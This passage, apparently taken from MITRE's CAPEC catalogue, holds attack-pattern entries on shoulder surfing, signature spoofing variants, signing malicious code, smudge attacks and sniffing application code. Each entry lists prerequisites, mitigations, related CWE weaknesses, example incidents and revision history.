Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
PeerOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	663	Exploitation of Transient Instruction Execution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate Data Structures

Prerequisites

The target applications, threads or functions must share resources between themselves.

The adversary must be able to manipulate some piece of the shared resource either directly or indirectly and the other users of the data must accept the changed data as valid. Usually this requires that the adversary be able to compromise one of the sharing applications or threads in order to manipulate the shared data.

Resources Required

None: The attacker does not need any specialized resources to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
1189	Improper Isolation of Shared Resources on System-on-a-Chip (SoC)
1331	Improper Isolation of Shared Resources in Network On Chip (NoC)

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description Summary, Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Description Summary, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, Description, Prerequisites, Related_Weaknesses, Resources_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Attack through Shared Data

2020-07-30 (Version 3.3)	Shared Data Manipulation

CAPEC-508: Shoulder Surfing

Attack Pattern ID: 508

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	651	Eavesdropping
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary typically requires physical proximity to the target's environment, in order to observe their screen or conversation. This may not be the case if the adversary is able to record the target and obtain sensitive information upon review of the recording.

Skills Required

[Level: Low]

In most cases, an adversary can simply observe and retain the desired information.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data	High

Mitigations

Be mindful of your surroundings when discussing or viewing sensitive information in public areas.

Pertaining to insider threats, ensure that sensitive information is not displayed to nor discussed around individuals without need-to-know access to said information.

Example Instances

An adversary can capture a target's banking credentials and transfer money to adversary-controlled accounts.

An adversary observes the target's mobile device lock screen pattern/passcode and then steals the device, which can now be unlocked.

An insider could obtain database credentials for an application and sell the credentials on the black market.

An insider overhears a conversation pertaining to classified information, which could then be posted on an anonymous online forum.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor
359	Exposure of Private Personal Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)

CAPEC-619: Signal Strength Tracking

Attack Pattern ID: 619

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Skills Required

[Level: Low]

Commercial tools are available.

Related Weaknesses

CWE-ID	Weakness Name
201	Insertion of Sensitive Information Into Sent Data

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences

CAPEC-473: Signature Spoof

Attack Pattern ID: 473

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	459	Creating a Rogue Certification Authority Certificate
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	474	Signature Spoofing by Key Theft
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	475	Signature Spoofing by Improper Validation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	476	Signature Spoofing by Misrepresentation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	477	Signature Spoofing by Mixing Signed and Unsigned Content
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	479	Malicious Root Certificate
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	485	Signature Spoofing by Key Recreation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.

The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature.

Skills Required

[Level: High]

Technical understanding of how signature verification algorithms work with data and applications

Consequences

Scope	Impact	Likelihood
Access Control Authentication	Gain Privileges

Example Instances

An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs.

An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor.

Related Weaknesses

CWE-ID	Weakness Name
20	Improper Input Validation
327	Use of a Broken or Risky Cryptographic Algorithm
290	Authentication Bypass by Spoofing

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1036.001	Masquerading: Invalid Code Signature
1553.002	Subvert Trust Controls: Code Signing

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns, Taxonomy_Mappings

CAPEC-475: Signature Spoofing by Improper Validation

Attack Pattern ID: 475

Abstraction: Detailed

View customized information:

Description

An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.

Extended Description

Signature verification algorithms are generally used to determine whether a certificate or piece of code (e.g. executable, binary, etc.) possesses a valid signature and can be trusted.

If the leveraged algorithm confirms that a valid signature exists, it establishes a foundation of trust that is further conveyed to the end-user when interacting with a website or application. However, if the signature verification algorithm improperly validates the signature, either by not validating the signature at all or by failing to fully validate the signature, it could result in an adversary generating a spoofed signature and being classified as a legitimate entity. Successfully exploiting such a weakness could further allow the adversary to reroute users to malicious sites, steals files, activates microphones, records keystrokes and passwords, wipes disks, installs malware, and more.

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	473	Signature Spoof
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient's application accepts the use of keys generated using cryptographically weak signature verification algorithms.

Skills Required

[Level: High]

Cryptanalysis of signature verification algorithm

[Level: High]

Reverse engineering and cryptanalysis of signature verification algorithm implementation

Mitigations

Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines.

Example Instances

The Windows CryptoAPI (Crypt32.dll) was shown to be vulnerable to signature spoofing by failing to properly validate Elliptic Curve Cryptography (ECC) certificates. If the CryptoAPI's signature validator allows the specification of a nonstandard base point (G): "An adversary can create a custom ECDSA certificate with an elliptic curve (ECC) signature that appears to match a known standard curve, like P-256 that includes a public key for an existing known trusted certificate authority, but which was in fact not signed by that certificate authority. Windows checks the public key and other curve parameters, but not the (bespoke adversary-supplied) base point generator (G) parameter constant which actually generated the curve" [REF-562]. Exploiting this vulnerability allows the adversary to leverage a spoofed certificate to dupe trusted network connections and deliver/execute malicious code, while appearing as legitimately trusted entity [REF-563]. This ultimately tricks the victim into believing the malicious website or executable is legitimate and originates from a properly verified source. See also: CVE-2020-0601

Related Weaknesses

CWE-ID	Weakness Name
347	Improper Verification of Cryptographic Signature
327	Use of a Broken or Risky Cryptographic Algorithm
295	Improper Certificate Validation

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-562] Kenn White. "Microsoft's Chain of Fools". First Principles. 2020-01-15. <https://blog.lessonslearned.org/chain-of-fools/>. URL validated: 2020-04-29.

[REF-563] "Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers". National Security Agency (NSA). 2020-01-14. <https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF>. URL validated: 2020-04-29.

[REF-564] Thomas Ptacek and Thomas Pornin. "Analysis of REF-563". Hacker News. <https://news.ycombinator.com/item?id=22048619>. URL validated: 2020-04-29.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Example_Instances
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Extended_Description

CAPEC-485: Signature Spoofing by Key Recreation

Attack Pattern ID: 485

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	473	Signature Spoof

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference.

An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer.

Skills Required

[Level: High]

Cryptanalysis of signature generation algorithm

[Level: High]

Reverse engineering and cryptanalysis of signature generation algorithm implementation and random number generation

[Level: High]

Ability to create malformed data blobs and know how to present them directly or indirectly to a victim.

Mitigations

Ensure cryptographic elements have been sufficiently tested for weaknesses.

Related Weaknesses

CWE-ID	Weakness Name
330	Use of Insufficiently Random Values

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1552.004	Unsecure Credentials: Private Keys

References

[REF-419] P.J. Leadbitter, D. Page and N.P. Smart. "Attacking DSA Under a Repeated Bits Assumption". http://www.iacr.org/archive/ches2004/31560428/31560428.pdf. 2004-07.

[REF-420] Debian Security. "DSA-1571-1 openssl -- predictable random number generator". http://www.debian.org/security/2008/dsa-1571. 2008-05-13.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-474: Signature Spoofing by Key Theft

Attack Pattern ID: 474

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	473	Signature Spoof

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

An authoritative or reputable signer is storing their private signature key with insufficient protection.

Skills Required

[Level: Low]

Knowledge of common location methods and access methods to sensitive data

[Level: High]

Ability to compromise systems containing sensitive data

Mitigations

Restrict access to private keys from non-supervisory accounts

Restrict access to administrative personnel and processes only

Ensure all remote methods are secured

Ensure all services are patched and up to date

Related Weaknesses

CWE-ID	Weakness Name
522	Insufficiently Protected Credentials

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1552.004	Unsecured Credentials: Private Keys

References

[REF-411] Sigbjørn Vik. "Security breach stopped". http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack. 2013-06-26.

[REF-412] Patrick Morley. "Bit9 and Our Customers’ Security". https://blog.bit9.com/2013/02/08/bit9-and-our-customers-security/. 2013-02-08.

[REF-413] Brad Arkin. "Inappropriate Use of Adobe Code Signing Certificate". http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html. 2012-09-27.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-476: Signature Spoofing by Misrepresentation

Attack Pattern ID: 476

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	473	Signature Spoof

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity.Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer.

Skills Required

[Level: High]

Attacker needs to understand the layout and composition of data blobs used by the target application.

[Level: High]

To discover a specific vulnerability, attacker needs to reverse engineer signature parsing, signature verification and signer representation code.

[Level: High]

Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit.

Mitigations

Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks.

Related Weaknesses

CWE-ID	Weakness Name
290	Authentication Bypass by Spoofing

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-414] Eric Johanson. "The state of homograph attacks". http://www.shmoo.com/idn/homograph.txt. 2005-02-11.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses

CAPEC-477: Signature Spoofing by Mixing Signed and Unsigned Content

Attack Pattern ID: 477

Abstraction: Detailed

View customized information:

Description

An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	473	Signature Spoof

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data

Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified.

Skills Required

[Level: High]

The attacker may need to continuously monitor a stream of signed data, waiting for an exploitable message to appear.

[Level: High]

Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit.

Mitigations

Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data.

Related Weaknesses

CWE-ID	Weakness Name
693	Protection Mechanism Failure
311	Missing Encryption of Sensitive Data
319	Cleartext Transmission of Sensitive Information

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)

CAPEC-206: Signing Malicious Code

Attack Pattern ID: 206

Abstraction: Detailed

View customized information:

Description

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Execution Flow

Explore

The adversary first attempts to obtain a digital certificate in order to sign their malware or tools. This certificate could be stolen, created by the adversary, or acquired normally through a certificate authority.
Based on the type of certificate obtained, the adversary will create a goal for their attack. This is either a broad or targeted attack. If an adversary was able to steal a certificate from a targeted organization, they could target this organization by pretending to have legitimate code signed by them. In other cases, the adversary would simply sign their malware and pose as legitimate software such that any user might trust it. This is the more broad approach

Experiment

The adversary creates their malware and signs it with the obtained digital certificate. The adversary then checks if the code that they signed is valid either through downloading from the targeted source or testing locally.

Exploit

Once the malware has been signed, it is then deployed to the desired location. They wait for a trusting user to run their malware, thinking that it is legitimate software. This malware could do a variety of things based on the motivation of the adversary.

Prerequisites

The targeted developer must use a signing key to sign code bundles. (Note that not doing this is not a defense - it only means that the adversary does not need to steal the signing key before forging code bundles in the developer's name.)

Resources Required

None: No specialized resources are required to execute this type of attack.

Mitigations

Ensure digital certificates are protected and inaccessible by unauthorized uses.

If a digital certificate has been compromised it should be revoked and regenerated.

Even if a piece of software has a valid and trusted digital signature, it should be assessed for any weaknesses and vulnerabilities.

Example Instances

In the famous Stuxnet malware incident, two digital certificates were compromised in order to sign malicious device drivers with legitimate credentials. The signing resulted in the malware appearing as trusted by the system it was running on, which facilitated the installation of the malware in kernel mode. This further resulted in Stuxnet remaining undetected for a significant amount of time. [REF-699]

The cyber espionage group CyberKittens leveraged a stolen certificate from AI Squared that allowed them to leverage a signed executable within Operation Wilted Tulip. This ultimately allowed the executable to run as trusted on the system, allowing a Crowd Strike stager to be loaded within the system's memory. [REF-714]

Related Weaknesses

CWE-ID	Weakness Name
732	Incorrect Permission Assignment for Critical Resource

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1553.002	Subvert Trust Controls:Code Signing

References

[REF-699] Nicolas Falliere, Liam O Murchu and Eric Chien. "W32.Stuxnet Dossier". Symantec. 2010-11. <https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf>. URL validated: 2022-02-17.

[REF-700] Cristin Goodwin and Joram Borenstein. "Guarding against supply chain attacks—Part 3: How software becomes compromised". Microsoft. 2020-03-11. <https://www.microsoft.com/security/blog/2020/03/11/guarding-against-supply-chain-attacks-part-3-how-software-becomes-compromised/>. URL validated: 2022-02-17.

[REF-714] "Operation Wilted Tulip: Exposing a cyber espionage apparatus". ClearSky cyber security and Trend Micro. 2017-07. <https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf>. URL validated: 2022-02-17.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Related_Weaknesses
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Execution_Flow
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description, Prerequisites, Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Example_Instances, Execution_Flow, Mitigations, References
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	Lifting signing key and signing malicious code from a production environment

CAPEC-626: Smudge Attack

Attack Pattern ID: 626

Abstraction: Detailed

View customized information:

Description

Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	395	Bypassing Electronic Locks and Access Controls

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Prerequisites

The attacker must have physical access to the device.

Skills Required

[Level: Medium]

The attacker must know how to make use of these smudges.

Consequences

Scope	Impact	Likelihood
Access Control	Bypass Protection Mechanism

Mitigations

Strong physical security of the device.

Related Weaknesses

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-65: Sniff Application Code

Attack Pattern ID: 65

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	157	Sniffing Attacks
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	37	Retrieve Embedded Sensitive Data

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Set up a sniffer: The adversary sets up a sniffer in the path between the server and the client and watches the traffic.
Techniques
The adversary sets up a sniffer in the path between the server and the client.

Exploit

Capturing Application Code Bound During Patching:
Techniques
adversary loads the sniffer to capture the application code bound during a dynamic update.
The adversary proceeds to reverse engineer the captured code.

Prerequisites

The attacker must have the ability to place themself in the communication path between the client and server.

The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.

The attacker must be able to employ a sniffer on the network without being detected.

Skills Required

[Level: Medium]

